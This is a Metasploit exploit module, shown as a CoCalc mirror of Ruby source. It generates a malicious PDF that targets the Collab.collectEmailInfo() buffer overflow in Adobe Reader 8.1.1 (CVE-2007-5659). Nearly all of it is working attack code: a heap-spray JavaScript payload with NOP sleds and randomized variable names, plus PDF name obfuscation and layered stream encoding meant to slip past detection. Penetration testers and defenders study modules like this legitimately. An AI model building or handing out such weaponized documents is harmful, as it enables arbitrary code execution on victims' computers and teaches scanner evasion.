Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'zlib'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GoodRanking

10


11
  include Msf::Exploit::FILEFORMAT

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Adobe Collab.collectEmailInfo() Buffer Overflow',

18
        'Description' => %q{

19
          This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.

20
          By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,

21
          an attacker may be able to execute arbitrary code.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],

25
        'References' => [

26
          [ 'CVE', '2007-5659' ],

27
          [ 'OSVDB', '41495' ]

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
          'DisablePayloadHandler' => true

32
        },

33
        'Payload' => {

34
          'Space' => 1024,

35
          'BadChars' => "\x00",

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [ 'Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)', { 'Ret' => '' } ],

40
        ],

41
        'DisclosureDate' => '2008-02-08',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),

54
      ]

55
    )

56
  end

57


58
  def exploit

59
    # Encode the shellcode.

60
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

61


62
    # Make some nops

63
    nops = Rex::Text.to_unescape(make_nops(4))

64


65
    # Randomize variables

66
    rand1 = rand_text_alpha(rand(100) + 1)

67
    rand2 = rand_text_alpha(rand(100) + 1)

68
    rand3 = rand_text_alpha(rand(100) + 1)

69
    rand4 = rand_text_alpha(rand(100) + 1)

70
    rand5 = rand_text_alpha(rand(100) + 1)

71
    rand6 = rand_text_alpha(rand(100) + 1)

72
    rand7 = rand_text_alpha(rand(100) + 1)

73
    rand8 = rand_text_alpha(rand(100) + 1)

74
    rand9 = rand_text_alpha(rand(100) + 1)

75
    rand10 = rand_text_alpha(rand(100) + 1)

76
    rand11 = rand_text_alpha(rand(100) + 1)

77
    rand12 = rand_text_alpha(rand(100) + 1)

78


79
    script = %Q|

80
    var #{rand1} = unescape("#{shellcode}");

81
    var #{rand2} ="";

82
    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");

83
    #{rand4} = #{rand2} + #{rand1};

84
    #{rand5} = unescape("#{nops}");

85
    #{rand6} = 20;

86
    #{rand7} = #{rand6}+#{rand4}.length

87
    while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

88
    #{rand8} = #{rand5}.substring(0, #{rand7});

89
    #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});

90
    while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};

91
    #{rand10} = new Array();

92
    for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};

93
    var #{rand12} = unescape("%u0c0c%u0c0c");

94
    while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};

95
    this.collabStore = Collab.collectEmailInfo({subj: "",msg: #{rand12}});

96
          |

97


98
    # Create the pdf

99
    pdf = make_pdf(script)

100


101
    print_status("Creating '#{datastore['FILENAME']}' file...")

102


103
    file_create(pdf)

104
  end

105


106
  def random_non_ascii_string(count)

107
    result = ""

108
    count.times do

109
      result << (rand(128) + 128).chr

110
    end

111
    result

112
  end

113


114
  def io_def(id)

115
    "%d 0 obj" % id

116
  end

117


118
  def io_ref(id)

119
    "%d 0 R" % id

120
  end

121


122
  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

123
  def n_obfu(str)

124
    result = ""

125
    str.scan(/./u) do |c|

126
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'

127
        result << "#%x" % c.unpack("C*")[0]

128
      else

129
        result << c

130
      end

131
    end

132
    result

133
  end

134


135
  def ascii_hex_whitespace_encode(str)

136
    result = ""

137
    whitespace = ""

138
    str.each_byte do |b|

139
      result << whitespace << "%02x" % b

140
      whitespace = " " * (rand(3) + 1)

141
    end

142
    result << ">"

143
  end

144


145
  def make_pdf(js)

146
    xref = []

147
    eol = "\x0d\x0a"

148
    endobj = "endobj" << eol

149


150
    # Randomize PDF version?

151
    pdf = "%PDF-1.5" << eol

152
    pdf << "%" << random_non_ascii_string(4) << eol

153
    xref << pdf.length

154
    pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj

155
    xref << pdf.length

156
    pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj

157
    xref << pdf.length

158
    pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj

159
    xref << pdf.length

160
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj

161
    xref << pdf.length

162
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj

163
    xref << pdf.length

164
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))

165
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol

166
    pdf << "stream" << eol

167
    pdf << compressed << eol

168
    pdf << "endstream" << eol

169
    pdf << endobj

170
    xrefPosition = pdf.length

171
    pdf << "xref" << eol

172
    pdf << "0 %d" % (xref.length + 1) << eol

173
    pdf << "0000000000 65535 f" << eol

174
    xref.each do |index|

175
      pdf << "%010d 00000 n" % index << eol

176
    end

177
    pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

178
    pdf << "startxref" << eol

179
    pdf << xrefPosition.to_s() << eol

180
    pdf << "%%EOF" << eol

181
  end

182
end

183


184